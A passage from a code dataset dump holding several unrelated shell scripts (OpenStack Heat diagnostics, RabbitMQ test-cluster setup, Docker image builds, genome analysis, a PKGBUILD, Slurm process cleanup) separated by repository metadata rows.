;;
esac
done
if ${OUTPUT_TO_FILE}; then
exec > >(tee ${FILE})
exec 2>&1
fi
RESOURCES=$(heat resource-list -n ${LEVEL} ${STACK} | awk '/FAILED/{print $4}')
for rsc_id in ${RESOURCES}
do
echo "Resource ${rsc_id}:"
heat deployment-output-show ${rsc_id} --all
HEAT_OUTPUT="$(heat deployment-show ${rsc_id})"
if ! [ -z "${HEAT_OUTPUT}" ]; then
SERVER_ID=$(echo ${HEAT_OUTPUT} | grep -oP "server_id.*?," | grep -o ${MATCH_DEPLOY})
echo "Server $(nova list | awk "/${SERVER_ID}/{print \$4 \" => \" \$12}")"
fi
echo '-------------------------'
done
exit 0
| true
|
5a0283466943a0580066ea7b387bfd68919fd4f9
|
Shell
|
ldclakmal/ballerina-security
|
/scenarios/e-commerce-system/test.sh
|
UTF-8
| 1,020
| 2.59375
| 3
|
[
"Apache-2.0"
] |
permissive
|
source assert.sh
echo -e "\n--- Starting WSO2IS STS ---"
docker run -p 9443:9443 ldclakmal/wso2is-sts:latest &
sleep 90s
echo -e "\n--- Starting Payment Service ---"
cd payment_service
bal run &
sleep 20s
echo -e "\n--- Starting Delivery Service ---"
cd ../delivery_service
bal run &
sleep 20s
echo -e "\n--- Starting Inventory Service ---"
cd ../inventory_service
bal run &
sleep 20s
echo -e "\n--- Starting Order Service ---"
cd ../order_service
bal run &
sleep 20s
echo -e "\n--- Starting API Gateway ---"
cd ../api_gateway
bal run &
sleep 20s
echo -e "\n--- Starting Client ---"
cd ../client
response=$(bal run 2>&1 | tail -n 1)
assertNotEmpty "$response"
echo -e "\nBallerina client response: $response"
search_response=$(jq -r '.search_response.data.electronics[0].brand' <<< $response)
assertNotEmpty $search_response
assertEquals "$search_response" "Apple"
order_response=$(jq -r '.order_response.payment.order_id' <<< $response)
assertNotEmpty $order_response
assertEquals "$order_response" "HQCKJ5496"
| true
|
c235a5871c1b2a4020531a4ae601a64a8ee5bb5c
|
Shell
|
tudor-berariu/bricks-ml-assignment
|
/2015/bricks/start_server.sh
|
UTF-8
| 1,007
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <scenario>"
exit
fi
./delete_pipes.sh
./create_pipes.sh
make
if [ "$1" -eq 1 ]; then
./bricks-game-server --gamesNo 1000000 --height 4 --width 4 \
--bricks distributions/dist1 \
--verbose 0 \
/
fi
if [ "$1" -eq 2 ]; then
./bricks-game-server --gamesNo 1000000 --height 8 --width 5 \
--bricks distributions/dist2 \
--verbose 0 \
/
fi
if [ "$1" -eq 3 ]; then
./bricks-game-server --gamesNo 1000000 --height 8 --width 5 \
--bricks distributions/dist3 \
--verbose 0 \
/
fi
if [ "$1" -eq 4 ]; then
./bricks-game-server --gamesNo 1000000 --height 8 --width 6 \
--bricks distributions/dist4 \
--verbose 0 \
/
fi
./delete_pipes.sh
| true
|
d04664cc0775299b4c0806737cc9be5f45fc5e9f
|
Shell
|
xCloudx8/Analysis_fasta_file_genomes
|
/analysis_virus.sh
|
UTF-8
| 3,027
| 2.828125
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/bash
VIRUSES=(
"Pseudomonas_phage_phi-6_segment_L"
"Enterobacteria_phage_phiX174_sensu_lato"
"Enterobacteria_phage_T4"
"Bacillus_phage_phi29"
"Enterobacteria_phage_T5"
"Sulfolobus_spindle-shaped_virus_4"
"Enterobacteria_phage_M13"
"Sulfolobus_islandicus_rod-shaped_virus_1"
"Enterobacteria_phage_T7"
"Escherichia_phage_P13374"
"Acidianus_filamentous_virus_1"
"Acidianus_two-tailed_virus"
"Cyanophage_P-RSM6"
"Aeromonas_phage_PX29"
"Aeromonas_phage_Aeh1"
)
for f in "${VIRUSES[@]}"
do
echo "Done with GenomeStats for: " $f
java -cp IGTools_cli.jar igtools.cli.GenomeStats /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa df -h | sed 's/ */\t/g' > /Project/Reports/Virus_Reports/"$f".csv
done
./order.py
echo "Ordered"
for f in "${VIRUSES[@]}"
do
echo "Please wait GenomeKStats for: " $f
java -cp IGTools_cli.jar igtools.cli.GenomeKStats "6" "24" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa df -h | sed 's/ */\t/g' > /Project/Reports/Virus_Reports/FromK/"$f".csv
done
rm /Project/Reports/Virus_distr/mdistr/*.mdistr
rm /Project/Reports/Virus_distr/minmaxavg/*.csv
echo "Removed all mdistr"
for f in "${VIRUSES[@]}"
do
for m in {6..24}
do
echo "Analizing MultiplicityDistribution: "$f " " $m
echo "-------------------------------------------------------------------------k='$m'" >> /Project/Reports/Virus_distr/mdistr/"$f".mdistr
java -cp IGTools_cli.jar igtools.cli.distributions.MultiplicityDistribution $m "a" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa | awk '{min=9999}; /#/ {num+=1; tot+=$3; if ($3<min) min=$3; if ($3>max) max=$3} END{ print min " " tot/num " " max }' >> /Project/Reports/Virus_distr/minmaxavg/"$f"min_avg_max.csv
echo " " >> /Project/Reports/Virus_distr/mdistr/"$f".mdistr
java -cp IGTools_cli.jar igtools.cli.distributions.MultiplicityDistribution $m "a" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa >> /Project/Reports/Virus_distr/mdistr/"$f".mdistr
done
done
rm /Project/Reports/Virus_distr/rldistr/*.rldistr
echo "Removed all rldistr"
for f in "${VIRUSES[@]}"
do
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
sed -i '1d' /Project/Reports/Virus_Reports/FromK/"$f".csv
for m in {1..100}
do
echo "Analizing RepeatLengthDistribution: "$f " " $m
echo "------------------------------------------------------------------------- k='$m'" >> /Project/Reports/Virus_distr/rldistr/"$f".rldistr
java -cp IGTools_cli.jar igtools.cli.distributions.RepeatLengthDistribution $m "a" /Project/Virus/Virus_3Bit/"$f".3bit /Project/Virus/Virus_nelsa/"$f".nelsa >> /Project/Reports/Virus_distr/rldistr/"$f".rldistr
done
sed -i '1 i\k |D_k| |H_k| |R_k| |T_k| |E_k|' /Project/Reports/Virus_Reports/FromK/"$f".csv
done
./concatenating_virus.py
| true
|
3251291672c0e26426189d612dcdffa28cf6a30f
|
Shell
|
SURAJTHEGREAT/dockerpymongowebframework
|
/bin/write-env.sh
|
UTF-8
| 1,541
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Create env files in the specified directory
CONF_DIR=${1:-conf}
mkdir -p ${CONF_DIR}
if [ ! -f ${CONF_DIR}/mongo.env ]; then
echo "MONGO_HOST=${MONGO_HOST:-mongo_db}" > ${CONF_DIR}/mongo.env
echo "MONGO_PORT=${MONGO_PORT:-27017}" >> ${CONF_DIR}/mongo.env
if [ -z ${MONGO_DB} ]; then
echo "#MONGO_DB=" >> ${CONF_DIR}/mongo.env
else
echo "MONGO_DB=${MONGO_DB}" >> ${CONF_DIR}/mongo.env
fi
if [ -z ${MONGO_USER} ]; then
echo "#MONGO_USER=" >> ${CONF_DIR}/mongo.env
else
echo "MONGO_USER=${MONGO_USER}" >> ${CONF_DIR}/mongo.env
fi
if [ -z ${MONGO_PASS} ]; then
echo "#MONGO_PASS=" >> ${CONF_DIR}/mongo.env
else
echo "MONGO_PASS=${MONGO_PASS}" >> ${CONF_DIR}/mongo.env
fi
fi
if [ ! -f ${CONF_DIR}/proxy.env ]; then
echo "proxy_enabled=${proxy_enabled:-False}" > ${CONF_DIR}/proxy.env
echo "#assoc_id=${assoc_id:- }" >> ${CONF_DIR}/proxy.env
echo "#assoc_pwd=${assoc_pwd:- }" >> ${CONF_DIR}/proxy.env
echo "#proxy_dns=${proxy_dns:- }" >> ${CONF_DIR}/proxy.env
echo "#proxy_port=${proxy_port:- }" >> ${CONF_DIR}/proxy.env
fi
if [ ! -f ${CONF_DIR}/repo.env ]; then
echo "git_user=${git_user:- }" > ${CONF_DIR}/repo.env
echo "git_pwd=${git_pwd:- }" >> ${CONF_DIR}/repo.env
echo "git_repo=${git_repo:- #bottle-pymongo}" >> ${CONF_DIR}/repo.env
fi
if [ ! -f ${CONF_DIR}/config.env ]; then
echo "CONFIG_PATH=${CONFIG_PATH:- }" > ${CONF_DIR}/config.env
echo "WEB_SERVICE=${WEB_SERVICE:- #bottle}" >> ${CONF_DIR}/config.env
fi
| true
|
d0f284928e69d23158e5641f266e793a5aa7e91a
|
Shell
|
elon-avisror/weather-api
|
/server/weather_api.sh
|
UTF-8
| 562
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/bash
# TODO: check json structure before executing the api call
# run the call_cds_api.py file with the parameters request.json file
python call_cds_api.py < request.json
# get the database (grib) result from the call_cds_api.py file and convert it to json file with the name: result.json (using grib_cli)
grib_to_json result.grib > result.json
# parse result.json file into a wheather_response.json file who describes in https://app.swaggerhub.com/apis/elonavisrur/CropyAPI/1.0.0#/
python parse.py < result.json
# return
send wheather_response.json
| true
|
98180a1aa1dd30eda0e62cb2dbcd7d00b98f6e9f
|
Shell
|
Fei-Guo/multi-tenancy
|
/incubator/virtualcluster/hack/lib/docker-image.sh
|
UTF-8
| 3,540
| 3.921875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Get the set of binaries that run in Docker (on Linux)
# Entry format is "<name-of-binary>,<base-image>".
# Binaries are placed in /usr/local/bin inside the image.
#
# $1 - server architecture
get_docker_wrapped_binaries() {
local arch=$1
local debian_base_version=v1.0.0
local debian_iptables_version=v11.0.2
local targets=()
for target in ${@:2}; do
targets+=($target,${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version})
done
if [ ${#targets[@]} -eq 0 ]; then
### If you change any of these lists, please also update VC_ALL_TARGETS
targets=(
manager,"${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version}"
syncer,"${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version}"
vn-agent,"${VC_BASE_IMAGE_REGISTRY}/debian-base-${arch}:${debian_base_version}"
)
fi
echo "${targets[@]}"
}
# This builds all the release docker images (One docker image per binary)
# Args:
# $1 - binary_dir, the directory to save the tared images to.
# $2 - arch, architecture for which we are building docker images.
create_docker_image() {
local binary_dir="$1"
local arch="$2"
local binary_name
local binaries=($(get_docker_wrapped_binaries "${arch}" "${@:3}"))
for wrappable in "${binaries[@]}"; do
local oldifs=$IFS
IFS=","
set $wrappable
IFS=$oldifs
local binary_name="$1"
local base_image=$2
local image_user=""
BASE_IMAGE=${BASE_IMAGE:-debian}
if [ "$BASE_IMAGE" == "distroless" ]; then
base_image="gcr.io/distroless/static:nonroot"
image_user="USER nonroot:nonroot"
fi
local docker_build_path="${binary_dir}/${binary_name}.dockerbuild"
local docker_file_path="${docker_build_path}/Dockerfile"
local binary_file_path="${binary_dir}/${binary_name}"
local docker_image_tag="${VC_DOCKER_REGISTRY}/${binary_name}-${arch}:latest"
echo "Starting docker build for image: ${binary_name}-${arch}"
(
rm -rf "${docker_build_path}"
mkdir -p "${docker_build_path}"
ln "${binary_dir}/${binary_name}" "${docker_build_path}/${binary_name}"
cat <<EOF > "${docker_file_path}"
FROM ${base_image}
COPY ${binary_name} /usr/local/bin/${binary_name}
${image_user}
EOF
"${DOCKER[@]}" build -q -t "${docker_image_tag}" "${docker_build_path}" >/dev/null
) &
done
wait-for-jobs || { echo "previous Docker build failed"; return 1; }
echo "Docker builds done"
}
# Package up all of the binaries in docker images
build_images() {
# Clean out any old images
rm -rf "${VC_RELEASE_DIR}"
mkdir -p "${VC_RELEASE_DIR}"
cd ${VC_BIN_DIR}
local targets=()
for arg; do
targets+=(${arg##*/})
done
echo "${targets[@]-}"
if [ ${#targets[@]} -eq 0 ]; then
cp "${VC_ALL_BINARIES[@]/#/}" ${VC_RELEASE_DIR}
else
cp ${targets[@]} ${VC_RELEASE_DIR}
fi
create_docker_image "${VC_RELEASE_DIR}" "amd64" "${targets[@]-}"
}
| true
|
f0174f9eac4b10406e8017c94cbd31727feca65a
|
Shell
|
binarin/rabbit_destructive_tests
|
/apps/sut/priv/git_checkout_cluster.sh
|
UTF-8
| 2,901
| 3.75
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
set -eu
set -o pipefail
export LANG=C
if ${trace:-false}; then
set -x
fi
ROOT=$(dirname $(readlink -f $0))
RABBIT_DIR=${1:?}
NUM_NODES=${2:-3}
: ${NUM_USERS:=10}
node-numbers() {
seq 1 ${1:?}
}
purge-node() {
local node_number="${1:?}"
local node_name
node_name="$(node-name $node_number)"
pkill -9 -f "$node_name" || true
rm -rf "/tmp/rabbitmq-test-instances/$node_name"
}
start-node() {
local node_number="${1:?}"
purge-node $node_number
# erlang.mk is not happy with nested invocations on unrelated projects
env -i "HOME=$HOME" "PATH=$PATH" make -C "$RABBIT_DIR" \
run-background-broker \
RABBITMQ_PID_FILE=$(node-pid-file $node_number) \
RABBITMQ_NODENAME=$(node-name $node_number) \
RABBITMQ_NODE_PORT=$(node-port $node_number) \
RABBITMQ_DIST_PORT=$(node-distribution-port $node_number)
}
node-name() {
echo "test-cluster-node-${1:?}@localhost"
}
node-port() {
echo $((17000 + ${1:?}))
}
node-distribution-port() {
echo $((27000 + ${1:?}))
}
start-n-nodes() {
local num_nodes="${1:?}"
for node_number in $(node-numbers $num_nodes) ; do
start-node $node_number
done
}
join-nodes() {
local node_to_join
local target_node_num="${1:?}"
shift
for node_num_to_join in "$@"; do
join-node $node_num_to_join $target_node_num
done
}
join-node() {
local node="${1:?}"
local target="${2:?}"
ensure-app-stopped-on-node $node
run-ctl $node join_cluster $(node-name $target)
start-app-on-node $node
}
ensure-app-stopped-on-node() {
run-ctl "${1:?}" stop_app
}
start-app-on-node() {
run-ctl "${1:?}" start_app
}
run-ctl() {
local node_number="${1:?}"
shift
ERL_LIBS="${RABBIT_DIR}/deps" "${RABBIT_DIR}/scripts/rabbitmqctl" -n "$(node-name $node_number)" "$@"
}
wait-nodes() {
local node_number
for node_number in "$@"; do
wait-node $node_number
done
}
node-pid-file() {
local node_number="${1:?}"
echo "/tmp/$(node-name $node_number).pid"
}
wait-node() {
local node_number="${1:?}"
local try_no
local await_result
for try_no in $(seq 1 10); do
await_result="$(run-ctl "$node_number" -t 10 eval "rabbit:await_startup().")"
if [[ $await_result == ok ]]; then
return 0
fi
done
return 1
}
create-user() {
local name="${1:?}"
local password="${2:?}"
run-ctl 1 add_user $name $password
}
create-users() {
local num_users="${1:?}"
local user_suffix
for user_suffix in $(seq 1 $num_users); do
create-user "sut$user_suffix" "sut$user_suffix"
done
}
set-ha-policy() {
run-ctl 1 set_policy ha-all "^ha\." '{"ha-mode":"all"}'
}
start-n-nodes $NUM_NODES
join-nodes $(node-numbers $NUM_NODES)
wait-nodes $(node-numbers $NUM_NODES)
create-users $NUM_USERS
set-ha-policy
| true
|
59a6a5c3148cf345b02bada906896720497a48bc
|
Shell
|
kaltsi/Mass-and-Balance
|
/parse_template.sh
|
ISO-8859-15
| 6,692
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# template-file aircraft.specs [output_dir]
#
set -euo pipefail
debug=${debug:-0}
export LC_CTYPE=C
fail() {
echo "FAIL: $*"
exit 1
}
if [ $# -lt 2 ] ; then
echo "Usage $0 template aircraft.specs [output_dir]"
exit 1
fi
[ ! -f "$1" ] && fail "template file: $1 - not found."
[ ! -f "$2" ] && fail "specs file: $2 - not found."
TEMPLATE_FILE="$1"
SPECS_FILE_PATH="$2"
OUTPUT_DIR=""
[ -n "$3" ] && OUTPUT_DIR="$3"
SPEC_BASE=$(basename ${SPECS_FILE_PATH})
SPEC_FILE=${SPEC_BASE%.*}
SPEC_EXT=${SPEC_BASE##*.}
[ "${SPEC_EXT}" != "specs" ] && fail "Spec file must have .specs extension (${SPEC_EXT})"
if [ -n "${OUTPUT_DIR}" ]; then
OUTPUT_FILE="${OUTPUT_DIR}/${SPEC_FILE}.html"
else
OUTPUT_FILE="${SPEC_FILE}.html"
fi
echo "Handling file: ${SPECS_FILE_PATH}"
# External variables
g_code_line=""
g_saveable=""
g_saveable_group=""
g_saveable_group_value=""
g_name=""
g_extra_mass=""
# These are the known load points. Anything else is considered user-added.
declare -a known=("BASIC_WEIGHT" "FRONT_SEAT" "FUEL" "BAGGAGE"
"TAXI_FUEL" "TOW" "LNDW" "ENDURANCE" "FUEL_FLOW"
"FLIGHT_TIME")
# Checks if a string is in the array
in_array() {
local hay needle=$1
shift
for hay; do
[ "${hay}" = "${needle}" ] && return 0
done
return 1
}
# name translation unit def min max mom [step]
#
# LP_N_BEW "English" "Suomi" "kg" 0 0 -1 1.923 0.1
#
# LP_I_xxx = interactive load point, declares a saveable variable
# LP_F_xxx = interactive fuel flow row
# LP_C_xxx = interactive checkbox row
# LP_R_xxx = non-interactive load point with result and value cells reversed
# LP_N_xxx = non-interactive load point
create_lp()
{
[ $# -lt 8 ] && fail "${FUNCNAME} called with $*"
local lpname=$1
local lang_en=$2
local lang_fi=$3
local unit=$4
local unit_def=$5
local unit_min=$6
local unit_max=$7
local mom=$8
local steps=
[ $# -eq 9 ] && steps=$9
local save_item=""
if [ "${lpname:0:5}" == "LP_I_" ] || [ "${lpname:0:5}" == "LP_F_" ] || [ "${lpname:0:5}" == "LP_C_" ]; then
save_item=".s"
fi
# Whatever comes after the first 5 chars
local the_name="${lpname:5}"
g_code_line=""
g_code_line="${the_name}=new l_point(\"${the_name}\","
g_code_line+=" [${lang_en}, ${lang_fi}],"
g_code_line+=" ${unit},"
# For non-interactive elements put the default value in place.
# For interactive values put the saveable name in place.
if [ "${lpname:0:5}" == "LP_N_" ] || [ "${lpname:0:5}" == "LP_R_" ]; then
g_code_line+=" ${unit_def},"
else
g_code_line+=" g_defs${save_item}.${the_name},"
fi
g_code_line+=" ${unit_min}, ${unit_max}, ${mom}"
if [ -n "${steps}" ]; then
g_code_line+=", ${steps}"
fi
g_code_line+=");"
if [ "${lpname:0:5}" == "LP_F_" ]; then
# fuel flow row
g_code_line+=" ${the_name}.fuel_flow = true;"
fi
g_name="${the_name}"
g_saveable_group="${the_name} : ${unit_def},"
g_saveable_group_value="${the_name}.vu.get_si(),"
# check if this was an unknown load point
g_extra_mass=""
in_array "${the_name}" "${known[@]}" || g_extra_mass="${the_name}"
}
# This expects the input to be of the following format
#
# LP_I_xxx = interactive load point, declares a saveable variable
# LP_F_xxx = interactive fuel flow row
# LP_C_xxx = interactive check box row
# LP_R_xxx = non-interactive load point with result and value cells reversed
# LP_N_xxx = non-interactive load point
create_row()
{
[ $# -lt 1 ] && fail "${FUNCNAME} called with $*"
local lpname=$1
local reverse=""
local non=""
local cbox=""
local the_name="${lpname:5}"
if [ "${1:0:5}" == "LP_R_" ]; then
reverse=", \"reverse\""
fi
if [ "${1:0:5}" = "LP_N_" ] || [ "${1:0:5}" = "LP_R_" ]; then
non="non_"
fi
if [ "${1:0:5}" = "LP_C_" ]; then
cbox="cbox_"
fi
g_code_line="rows.push(new ${non}${cbox}interactive_row(${the_name}${reverse}));"
}
simple_replace()
{
[ $# -ne 2 ] && fail "${FUNCNAME} needs 2 parameters"
local a=$1
local b=$2
[ -z "$a" ] && fail "${FUNCNAME} got zero length string"
[ ${debug} -ne 0 ] && echo "Replacing: /$a/ with /$b/"
perl -i -pe 'BEGIN{undef $/;} s/\*'$a'\*/.*?/\*\*/'"$b"'smg' ${OUTPUT_FILE}
}
# the modifications will be done on the output file
cp ${TEMPLATE_FILE} ${OUTPUT_FILE}
code_output=""
variable_names=""
saveables_group=""
saveable_group_values=""
extra_mass=""
while read i; do
if [ "${i:0:1}" != "#" ] && [ "${i:0:1}" != " " ] && [ "${i:0:1}" != '' ]; then
name=$(cut -f 1 -d = <<< "$i")
value=$(cut -f 2- -d = <<< "$i")
if [ "${name}" = "LOAD_POINT" ]; then
create_lp ${value}
variable_names="${variable_names}${g_name}\n"
code_output+=$(echo ${g_code_line} | sed -e "s/#/ /g")"\n"
if [ "${value:0:5}" == "LP_I_" ] || [ "${value:0:5}" == "LP_F_" ] || [ "${value:0:5}" == "LP_C_" ]; then
saveables_group+="${g_saveable_group}\n"
saveable_group_values+="${g_saveable_group_value}\n"
fi
create_row ${value}
code_output+="${g_code_line}\n"
if [ -n "${g_extra_mass}" ]; then
extra_mass+=" ${g_extra_mass}"
fi
else
simple_replace "${name}" "${value}"
fi
fi
done < $SPECS_FILE_PATH
simple_replace "REPLACE_TABLE_ROWS" "${code_output}"
for i in $(echo -e ${variable_names} | sed -e "s/\\n/ /g"); do
simple_replace "$i" "$i"
done
simple_replace "SAVEABLES" "${saveables_group}"
simple_replace "SAVEABLE_VALUES" "${saveable_group_values}"
extra_calc_mass=""
extra_mass_calc_moments=""
extra_mass_moments=""
extra_debug_lines=""
create_extra_mass()
{
local i
for i in $*; do
extra_calc_mass+="$i,\n"
extra_mass_calc_moments+="calc_moment($i);\n"
extra_mass_moments+="$i.moment +\n"
extra_debug_lines+="debug.textContent += (\" \" + $i.moment.toFixed(3));\n"
done
}
if [ -n "${extra_mass}" ]; then
create_extra_mass "${extra_mass}"
else
# create empty replace for the extra equipment
create_extra_mass " "
fi
simple_replace "EXTRA_CALC_MASS" "${extra_calc_mass}"
simple_replace "EXTRA_MASS_CALC_MOMENTS" "${extra_mass_calc_moments}"
simple_replace "EXTRA_MASS_MOMENTS" "${extra_mass_moments}"
simple_replace "EXTRA_DEBUG" "${extra_debug_lines}"
# finally hide the debug button from the published sheets
simple_replace "HIDE_DEBUG" " "
echo "Output file is: ${OUTPUT_FILE}"
exit 0
| true
|
04642bac781d9239f2b63ac4eab2972e913c25db
|
Shell
|
ilventu/aur-mirror
|
/guile-ncurses/PKGBUILD
|
UTF-8
| 678
| 2.828125
| 3
|
[] |
no_license
|
# Contributor: tantalum <tantalum at online dot de>
pkgname=guile-ncurses
pkgver=1.3
pkgrel=1
pkgdesc='Guile bindings for the GNU NCurses library'
arch=(any)
license=(GLPL3)
depends=(guile ncurses libunistring)
url=http://www.gnu.org/software/guile-ncurses/
source=(ftp://ftp.gnu.org/gnu/$pkgname/$pkgname-$pkgver.tar.gz)
md5sums=(b9f20e0cbf1f2d19bb7e01c44356f1b7)
build() {
cd ${srcdir}/${pkgname}-${pkgver}
./configure --prefix=/usr --with-ncursesw --with-guilesitedir="$(guile-config info sitedir)" ||return 1
make && make DESTDIR=${pkgdir} install ||return 1
#remove documentation
if [ -e ${pkgdir}/usr/share/info/dir ]; then
rm ${pkgdir}/usr/share/info/dir
fi
}
| true
|
cb2cb9886c2739e450ff5b2ac8114b9cd17f4443
|
Shell
|
luotao1/benchmark
|
/api/run_op_benchmark.sh
|
UTF-8
| 940
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
OP_BENCHMARK_ROOT="$( cd "$( dirname "${BASH_SOURCE[0]}")" && pwd )"
test_module_name=${1:-"tests"}
gpu_ids=${2:-"0"}
timestamp=`date '+%Y%m%d-%H%M%S'`
if [ ${test_module_name} = "tests" ]; then
log_dir_name="logs"
elif [ ${test_module_name} = "tests_v2" ]; then
log_dir_name="logs_v2"
else
echo "Please set test_module_name to \"tests\" or \"tests_v2\""
exit
fi
output_dir=${OP_BENCHMARK_ROOT}/${log_dir_name}/${timestamp}
if [ ! -d ${OP_BENCHMARK_ROOT}/${log_dir_name} ]; then
mkdir -p ${OP_BENCHMARK_ROOT}/${log_dir_name}
fi
if [ ! -d ${output_dir} ]; then
mkdir -p ${output_dir}
fi
tests_dir=${OP_BENCHMARK_ROOT}/${test_module_name}
config_dir=${OP_BENCHMARK_ROOT}/${test_module_name}/configs
log_path=${OP_BENCHMARK_ROOT}/${log_dir_name}/log_${timestamp}.txt
bash ${OP_BENCHMARK_ROOT}/deploy/main_control.sh ${tests_dir} ${config_dir} ${output_dir} ${gpu_ids} "both" "both" > ${log_path} 2>&1 &
| true
|
cd1b5b7a8351a33e600ed7444ee7db478eb3e596
|
Shell
|
xuxiandi/libssdb
|
/build.sh
|
UTF-8
| 1,771
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/sh
BASE_DIR=`pwd`
TARGET_OS=`uname -s`
LEVELDB_PATH="$BASE_DIR/deps/leveldb-1.14.0"
SNAPPY_PATH="$BASE_DIR/deps/snappy-1.1.0"
MAKE=make
case "$TARGET_OS" in
Darwin)
#PLATFORM_CLIBS="-pthread"
#PLATFORM_CFLAGS=""
;;
Linux)
PLATFORM_CLIBS="-pthread"
;;
CYGWIN_*)
PLATFORM_CLIBS="-lpthread"
;;
SunOS)
PLATFORM_CLIBS="-lpthread -lrt"
;;
FreeBSD)
PLATFORM_CLIBS="-lpthread"
MAKE=gmake
;;
NetBSD)
PLATFORM_CLIBS="-lpthread -lgcc_s"
;;
OpenBSD)
PLATFORM_CLIBS="-pthread"
;;
DragonFly)
PLATFORM_CLIBS="-lpthread"
;;
HP-UX)
PLATFORM_CLIBS="-pthread"
;;
*)
echo "Unknown platform!" >&2
exit 1
esac
DIR=`pwd`
cd $SNAPPY_PATH
if [ ! -f Makefile ]; then
echo ""
echo "##### building snappy... #####"
./configure
# FUCK! snappy compilation doesn't work on some linux!
find . | xargs touch
make
echo "##### building snappy finished #####"
echo ""
fi
cd "$DIR"
rm -f build_config.mk
echo "MAKE=$MAKE" >> build_config.mk
echo "LEVELDB_PATH=$LEVELDB_PATH" >> build_config.mk
echo "SNAPPY_PATH=$SNAPPY_PATH" >> build_config.mk
echo "CFLAGS=" >> build_config.mk
echo "CFLAGS = -DNDEBUG -D__STDC_FORMAT_MACROS -Wall -O2 -Wno-sign-compare" >> build_config.mk
echo "CFLAGS += ${PLATFORM_CFLAGS}" >> build_config.mk
echo "CFLAGS += -I \"$LEVELDB_PATH/include\"" >> build_config.mk
echo "CFLAGS += -I \"$BASE_DIR/src/include\"" >> build_config.mk
echo "CLIBS=" >> build_config.mk
echo "CLIBS += ${PLATFORM_CLIBS}" >> build_config.mk
echo "CLIBS += \"$LEVELDB_PATH/libleveldb.a\"" >> build_config.mk
echo "CLIBS += \"$SNAPPY_PATH/.libs/libsnappy.a\"" >> build_config.mk
| true
|
9b76f364b86114454c9c372e3db7fdbfd54214c8
|
Shell
|
BharathR-Git/ec2-user
|
/scripts/createsoft.sh
|
UTF-8
| 490
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Create a softlink"
read file
echo "Enter a file name"
if [ ! -f $file ];then
echo "$file doesn't exist"
exit 1
fi
echo "Enter softlink name of a file $file"
read link
if [ -L $link ];then
echo "$link already exists"
exit 1
fi
ln -s $file $link
| true
|
3b29adc441579212b08d57efc8f2ca91eaf3485a
|
Shell
|
jk983294/CommonScript
|
/linux/ShellScript/for/create_user.sh
|
UTF-8
| 118
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# use arguments
# ./create_user.sh a b c d
for u in $*; do
echo "add user $u"
done
echo "finished"
| true
|
cc910f1402bfa1ae09e6ad1c25937c2e8b4a8a72
|
Shell
|
artpol84/jobstart
|
/slurm_deploy/files/slurm_kill.sh
|
UTF-8
| 599
| 3.375
| 3
|
[
"BSD-3-Clause-Open-MPI"
] |
permissive
|
#
# Copyright (C) 2016-2017 Mellanox Technologies, Inc.
# All rights reserved.
# $COPYRIGHT$
#
# Additional copyrights may follow
#
# $HEADER$
#
#!/bin/bash -x
SLURM_INST=$1
function kill_binary()
{
name=$1
if [ ! -f "$SLURM_INST/var/$name.pid" ]; then
return 0
fi
pid=`cat $SLURM_INST/var/$name.pid`
need_kill=`ps ax | grep "$pid" | grep $name`
if [ -n "$need_kill" ]; then
kill -KILL $pid
fi
}
function kill_slurmd()
{
kill_binary "slurmd"
}
function kill_ctld()
{
kill_binary "slurmctld"
}
kill_slurmd
kill_ctld
| true
|
47b1b53124461b0d729ac2fc536d0f1d78eb0e2a
|
Shell
|
porcupine18/rwloadsim
|
/src/rwlpatch.sh
|
UTF-8
| 714
| 3
| 3
|
[
"UPL-1.0"
] |
permissive
|
#!/bin/bash
#
# Copyright (c) 2021 Oracle Corporation
# Licensed under the Universal Permissive License v 1.0
# as shown at https://oss.oracle.com/licenses/upl/
#
# Create a new rwlpatch.c file
#
# History
#
# bengsig 10-feb-2021 Only patch, rest in rwlwatermark
# bengsig 16-dec-2020 Make first patch zero
# bengsig 14-dec-2020 Allow non existing rwlpatch.txt
# bengsig 04-sep-2020 Solaris port, use printf in stead of echo
# bengsig 11-jun-2017 Create
if test -f rwlpatch.txt
then
patch=`cat rwlpatch.txt`
newpatch=`expr $patch + 1`
else
newpatch=0
fi
printf '%s\n' "$newpatch" > rwlpatch.txt
printf '#include "rwl.h"\n' > rwlpatch.c
printf 'ub4 rwlpatch = %s;\n' "$newpatch" >> rwlpatch.c
| true
|
9086392f931a67c921788186a52a2f284241ab90
|
Shell
|
anutter4/dotfiles
|
/bash/available-scripts.d/screen.sh
|
UTF-8
| 335
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Helps screen share ssh-agents
#
# Must have the following in .screenrc:
#
# unsetenv SSH_AUTH_SOCK
